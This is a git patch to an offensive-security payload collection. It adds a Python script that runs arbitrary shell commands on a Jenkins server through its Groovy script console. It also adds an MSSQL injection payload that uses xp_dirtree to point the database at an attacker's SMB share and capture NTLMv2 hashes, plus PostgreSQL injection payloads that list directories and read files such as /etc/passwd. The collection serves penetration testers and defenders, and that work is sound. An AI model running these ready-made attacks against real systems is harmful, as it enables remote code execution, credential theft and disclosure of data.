From 78c882fb3458531de6f2c78807d736ac192b1b00 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 17 Feb 2019 20:02:16 +0100 Subject: [PATCH] Jenkins Grrovy + MSSQL UNC + PostgreSQL list files --- CVE Exploits/Jenkins Groovy Console.py | 30 +++++++++++++++++++ .../Active Directory Attack.md | 5 ++++ SQL injection/MSSQL Injection.md | 8 +++++ SQL injection/PostgreSQL Injection.md | 3 ++ 4 files changed, 46 insertions(+) create mode 100644 CVE Exploits/Jenkins Groovy Console.py diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py new file mode 100644 index 0000000..10bc080 --- /dev/null +++ b/CVE Exploits/Jenkins Groovy Console.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python +# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py +# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b +import requests +import sys + +print """ +Jenkins Groovy Console cmd runner. + +usage: ./jgc.py [HOST] + +Then type any command and wait for STDOUT output from remote machine. +Type 'exit' to exit :) +""" +URL = sys.argv[1] + '/scriptText' +HEADERS = { + 'User-Agent': 'jgc' +} + +while 1: + CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ") + if CMD == 'exit': + print "exiting...\n" + exit(0) + + DATA = { + 'script': 'println "{}".execute().text'.format(CMD) + } + result = requests.post(URL, headers=HEADERS, data=DATA) + print result.text \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index af8f813..f29af93 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -68,6 +68,11 @@ ``` * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) +* [Ping Castle](https://github.com/vletoux/pingcastle) + + ```powershell + pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession + ``` ## Most common paths to AD compromise diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index 9510870..0061bad 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +## MSSQL UNC Path + +MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. + +```sql +1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- +``` + ## MSSQL Make user DBA (DB admin) ```sql diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index c92b4ae..8eddd8a 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ## PostgreSQL File Read ```sql +select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` +NOTE: ``pg_read_file` doesn't accept the `/` character. + ```sql CREATE TABLE temp(t TEXT); COPY temp FROM '/etc/passwd';